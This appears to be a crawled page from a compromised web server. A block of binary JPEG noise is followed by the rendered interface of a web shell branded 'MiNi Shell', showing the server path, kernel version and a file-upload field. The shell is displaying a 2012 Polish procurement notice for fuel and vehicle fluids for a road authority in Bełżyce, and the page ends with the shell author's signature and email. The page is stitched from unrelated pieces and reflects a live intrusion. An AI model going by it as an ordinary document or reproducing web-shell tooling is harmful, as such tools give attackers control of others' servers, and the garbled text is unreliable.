JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121207/498074-N-2012.html

<p class="kh_header"><b>Bełżyce: Dostawa paliw płynnych, tj. oleju napędowego i benzyny bezołowiowej oraz materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu, będących w dyspozycji Zarządu Dróg Powiatowych w Lublinie z/s w Bełżycach.</b><br>
<b>Numer ogłoszenia: 498074 - 2012; data zamieszczenia: 07.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Lublinie z/s w Bełżycach , ul. Żeromskiego 3, 24-200 Bełżyce, woj. lubelskie, tel. 081 5162475, 5162885, faks 081 5162478.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ebip.lublin.pl/57</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Powiatowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa paliw płynnych, tj. oleju napędowego i benzyny bezołowiowej oraz materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu, będących w dyspozycji Zarządu Dróg Powiatowych w Lublinie z/s w Bełżycach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa paliw płynnych, tj. oleju napędowego i benzyny bezołowiowej oraz materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu, będących w dyspozycji Zarządu Dróg Powiatowych w Lublinie z/s w Bełżycach. Kody CPV: 09.10.00.00-0 Paliwa, 09.21.16.50-2 Płyny hamulcowe, 09.13.21.00-4 Benzyna bezołowiowa, 09.13.40.00-7 Oleje napędowe, 09.21.11.00-2 Oleje silnikowe, 09.21.16.00-7 Oleje do użytku w układach hydraulicznych i do innych celów. Dostawa oleju napędowego i benzyny bezołowiowej oraz materiałów eksploatacyjnych dokonywana będzie sukcesywnie w miarę potrzeb zamawiającego w formie bezgotówkowych transakcji na stacjach Wykonawców. Zamówienie, za względu na rozległy obszar objęty zamówieniem, duże odległości pomiędzy obwodami i siedzibą jednostki, a także trudności związane z przemieszczaniem się sprzętu, obejmuje trzy części:
Część 1 zamówienia: Dostawa - zakup paliw płynnych i materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu będących w dyspozycji Zarządu Dróg Powiatowych w Lublinie z/s w Bełżycach i Obwodu Drogowo - Mostowego Nr 1 w Bełżycach, w asortymencie i ilości: 1.Etylina Pb 95 - 10 730 l, 2. Olej napędowy - 16 300 l, 3. Olej silnikowy mineralny 15W 40 - 50 l, 4. Olej do pił do mieszanki - 30 l, 5. Olej do pił do łańcucha - 440 l, 6. Olej przekładniowy - 300 l, 7.Płyn do spryskiwaczy letni - 70 l, 8. Płyn do spryskiwaczy zimowy - 80 l. Na cz. 1 zamówienia Zamawiający zamierza przeznaczyć kwotę: 162 000,00 zł brutto. Stacja paliw winna być czynna we wszystkie dni tygodnia, również w niedziele i święta z możliwością dokonywania bezgotówkowych transakcji tankowania pojazdów w godzinach otwarcia danej stacji paliw oraz znajdować się w odległości nie przekraczającej 12 km, licząc od siedziby Obwodu Drogowo-Mostowego Nr 1 w Bełżycach, dojazd wyłącznie drogami utwardzonymi. Zakupy dokonywane będą przez upoważnione przez Zamawiającego osoby. W dniu podpisania umowy Zamawiający przekaże Wykonawcy wykaz pojazdów i sprzętu służbowego, z podaniem marki oraz numeru rejestracyjnego, a także wykaz osób uprawnionych do tankowania pojazdów i sprzętu służbowego.
Część 2 zamówienia: Dostawa - zakup paliw płynnych i materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu będących w dyspozycji Obwodu Drogowego Nr 2 w Bychawie, w asortymencie i ilości: 1. Etylina Pb 95 - 3 500 l, 2. Olej napędowy - 21 800 l, 3. Olej silnikowy mineralny 15W 40 - 30 l, 4. Olej do pił do mieszanki - 30 l, 5. Olej do pił do łańcucha - 580 l, 6. Olej przekładniowy - 60 l, 7. Płyn do spryskiwaczy letni - 50 l, 8.Płyn do spryskiwaczy zimowy - 50 l, 9. Płyn chłodniczy - 30 l. Na cz. 2 zamówienia Zamawiający zamierza przeznaczyć kwotę: 150 000,00 zł brutto. Stacja paliw winna być czynna we wszystkie dni tygodnia, również w niedziele i święta z możliwością dokonywania bezgotówkowych transakcji tankowania pojazdów w godzinach otwarcia danej stacji paliw oraz znajdować się w odległości nie przekraczającej 12 km, licząc od siedziby Obwodu Drogowego Nr 2 w Bychawie, dojazd wyłącznie drogami utwardzonymi. Zakupy dokonywane będą przez upoważnione przez Zamawiającego osoby. W dniu podpisania umowy Zamawiający przekaże Wykonawcy wykaz pojazdów i sprzętu służbowego, z podaniem marki oraz numeru rejestracyjnego, a także wykaz osób uprawnionych do tankowania pojazdów i sprzętu służbowego.
Część 3 zamówienia: Dostawa - zakup paliw płynnych i materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu będących w dyspozycji Obwodu Drogowego Nr 3 w Garbowie, w asortymencie i ilości: 1.Etylina Pb 95 - 3 050 l, 2. Olej napędowy - 6 700 l, 3. Olej silnikowy mineralny 15W 40 - 28 l, 4. Olej do pił do mieszanki - 10 l, 5. Olej do pił do łańcucha - 230 l, 6. Olej przekładniowy - 51 l, 7. Płyn do spryskiwaczy letni - 10 l, 8. Płyn do spryskiwaczy zimowy - 12 l. Na cz. 3 zamówienia Zamawiający zamierza przeznaczyć kwotę: 60 000,00 zł brutto. Stacja paliw winna być czynna we wszystkie dni tygodnia, również w niedziele i święta z możliwością dokonywania bezgotówkowych transakcji tankowania pojazdów w godzinach otwarcia danej stacji paliw oraz znajdować się w odległości nie przekraczającej 12 km, licząc od siedziby Obwodu Drogowego Nr 3 w Garbowie, dojazd wyłącznie drogami utwardzonymi. Zakupy dokonywane będą przez upoważnione przez Zamawiającego osoby. W dniu podpisania umowy Zamawiający, przekaże Wykonawcy wykaz pojazdów i sprzętu służbowego, z podaniem marki oraz numeru rejestracyjnego, a także wykaz osób uprawnionych do tankowania pojazdów i sprzętu służbowego.
Zamawiający zastrzega, że podane powyżej ilości ujęte do zamówienia są ilościami orientacyjnymi i w trakcie realizacji umowy mogą ulec zmniejszeniu. Zmniejszenie wielkości zamówienia nie stanowi podstaw do żadnych roszczeń Wykonawcy z tego powodu. Są to ilości podane na podstawie zużycia w 2012 roku. 
Paliwa i materiały eksploatacyjne muszą spełniać wszelkie wymogi jakościowe dopuszczające je do użycia zgodnie z przeznaczeniem. 
Paliwo musi spełniać wymagania jakościowe określone w Rozporządzeniu Ministra Gospodarki z dnia 9 grudnia 2008 roku w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 2008r. Nr 221, poz. 1441 z późn. zm.) oraz wymagania norm: - PN-EN 590+A1:2011 Paliwa do pojazdów samochodowych - Oleje napędowe - Wymagania i metody badań; - PN-EN 228:2009 Paliwa do pojazdów samochodowych - Benzyna bezołowiowa - Wymagania i metody badań. 
Materiały muszą posiadać wymagane aprobaty techniczne, atesty, świadectwa jakości czy deklaracje zgodności z obowiązującymi normami.
Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 23 kwietnia 1964 roku Kodeks cywilny (t.j. Dz. U. z 1964r. Nr 16 poz. 93 z późn. zm.) i ustawie z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tj. Dz. U. z 2010r., Nr 113, poz. 759 z późn. zm.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.10.00.00-0, 09.21.16.50-2, 09.13.21.00-4, 09.13.40.00-7, 09.21.11.00-2, 09.21.16.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada aktualną koncesję o której mowa w art. 32 ust. 1 pkt 4 Ustawy z dnia 10 kwietnia 1997r. Prawo energetyczne (tj. Dz. U. z 2006r. Nr 89 poz. 625 z późniejszymi zmianami) w zakresie obrotu paliwami objętymi niniejszym zamówieniem. Zamawiający żąda załączenia kserokopii dokumentu potwierdzającego posiadanie koncesji w zakresie obrotu paliwami objętymi niniejszym zamówieniem</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp. Zał. nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp. Zał. nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp. Zał. nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp. Zał. nr 1 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy na poniższych warunkach: a) w przypadku zmiany stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego, b) w przypadku wystąpienia siły wyższej (tj. działania i zamieszki wojenne, ataki terrorystyczne klęski żywiołowe spowodowane przez burze, huragany, ekonomiczne następstwa globalnego kryzysu finansowego i inne) uniemożliwiającej wykonanie zamówienia w terminie umownym, c) w przypadku wystąpienia niesprzyjających warunków atmosferycznych (np. długotrwałe i intensywne opady śniegu, silny wiatr, zawieje i zamiecie) powodujących utrudnienia w realizacji przedmiotu umowy w terminie umownym</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/57<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba ZDP, 24-200 Bełżyce, ul. Żeromskiego 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2012 godzina 10:15, miejsce: Siedziba zamawiającego, pokój nr 9 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa - zakup paliw płynnych i materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu będących w dyspozycji Zarządu Dróg Powiatowych w Lublinie z/s w Bełżycach i Obwodu Drogowo - Mostowego Nr 1 w Bełżycach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa - zakup paliw płynnych i materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu będących w dyspozycji Zarządu Dróg Powiatowych w Lublinie z/s w Bełżycach i Obwodu Drogowo - Mostowego Nr 1 w Bełżycach, w asortymencie i ilości:
1.	Etylina Pb 95 - 10 730 l
2.	Olej napędowy - 16 300 l
3.	Olej silnikowy mineralny 15W 40 - 50 l
4.	Olej do pił do mieszanki - 30 l
5.	Olej do pił do łańcucha - 440 l
6.	Olej przekładniowy - 300 l
7.	Płyn do spryskiwaczy letni - 70 l
8.	Płyn do spryskiwaczy zimowy - 80 l

Na cz. 1 zamówienia Zamawiający zamierza przeznaczyć kwotę: 162 000,00 zł brutto.
Stacja paliw winna być czynna we wszystkie dni tygodnia, również w niedziele i święta z możliwością dokonywania bezgotówkowych transakcji tankowania pojazdów w godzinach otwarcia danej stacji paliw oraz znajdować się w odległości nie przekraczającej 12 km, licząc od siedziby Obwodu Drogowo-Mostowego Nr 1 w Bełżycach, dojazd wyłącznie drogami utwardzonymi. Zakupy dokonywane będą przez upoważnione przez Zamawiającego osoby. W dniu podpisania umowy Zamawiający przekaże Wykonawcy wykaz pojazdów i sprzętu służbowego, z podaniem marki oraz numeru rejestracyjnego, a także wykaz osób uprawnionych do tankowania pojazdów i sprzętu służbowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.10.00.00-0, 09.21.16.50-2, 09.13.21.00-4, 09.13.40.00-7, 09.21.11.00-2, 09.21.16.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa - zakup paliw płynnych i materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu będących w dyspozycji Obwodu Drogowego Nr 2 w Bychawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa - zakup paliw płynnych i materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu będących w dyspozycji Obwodu Drogowego Nr 2 w Bychawie, 
w asortymencie i ilości: 
1.	Etylina Pb 95 - 3 500 l
2.	Olej napędowy - 21 800 l
3.	Olej silnikowy mineralny 15W 40 - 30 l
4.	Olej do pił do mieszanki - 30 l
5.	Olej do pił do łańcucha - 580 l
6.	Olej przekładniowy - 60 l
7.	Płyn do spryskiwaczy letni - 50 l
8.	Płyn do spryskiwaczy zimowy - 50 l
9.	Płyn chłodniczy - 30 l.

Na cz. 2 zamówienia Zamawiający zamierza przeznaczyć kwotę: 150 000,00 zł brutto.
Stacja paliw winna być czynna we wszystkie dni tygodnia, również w niedziele i święta z możliwością dokonywania bezgotówkowych transakcji tankowania pojazdów w godzinach otwarcia danej stacji paliw oraz znajdować się w odległości nie przekraczającej 12 km, licząc od siedziby Obwodu Drogowego Nr 2 w Bychawie, dojazd wyłącznie drogami utwardzonymi. Zakupy dokonywane będą przez upoważnione przez Zamawiającego osoby. W dniu podpisania umowy Zamawiający przekaże Wykonawcy wykaz pojazdów i sprzętu służbowego, z podaniem marki oraz numeru rejestracyjnego, a także wykaz osób uprawnionych do tankowania pojazdów i sprzętu służbowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.21.16.50-2, 09.13.21.00-4, 09.13.40.00-7, 09.21.11.00-2, 09.21.16.00-7, 09.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa - zakup paliw płynnych i materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu będących w dyspozycji Obwodu Drogowego Nr 3 w Garbowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa - zakup paliw płynnych i materiałów eksploatacyjnych dla pojazdów służbowych i sprzętu będących w dyspozycji Obwodu Drogowego Nr 3 w Garbowie, 
w asortymencie i ilości:
1.	Etylina Pb 95 - 3 050 l
2.	Olej napędowy - 6 700 l
3.	Olej silnikowy mineralny 15W 40 - 28 l
4.	Olej do pił do mieszanki - 10 l
5.	Olej do pił do łańcucha - 230 l
6.	Olej przekładniowy - 51 l
7.	Płyn do spryskiwaczy letni - 10 l
8.	Płyn do spryskiwaczy zimowy - 12 l

Na cz. 3 zamówienia Zamawiający zamierza przeznaczyć kwotę: 60 000,00 zł brutto.
Stacja paliw winna być czynna we wszystkie dni tygodnia, również w niedziele i święta z możliwością dokonywania bezgotówkowych transakcji tankowania pojazdów w godzinach otwarcia danej stacji paliw oraz znajdować się w odległości nie przekraczającej 12 km, licząc od siedziby Obwodu Drogowego Nr 3 w Garbowie, dojazd wyłącznie drogami utwardzonymi. Zakupy dokonywane będą przez upoważnione przez Zamawiającego osoby. W dniu podpisania umowy Zamawiający, przekaże Wykonawcy wykaz pojazdów i sprzętu służbowego, z podaniem marki oraz numeru rejestracyjnego, a także wykaz osób uprawnionych do tankowania pojazdów i sprzętu służbowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.10.00.00-0, 09.21.16.50-2, 09.13.21.00-4, 09.13.40.00-7, 09.21.11.00-2, 09.21.16.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com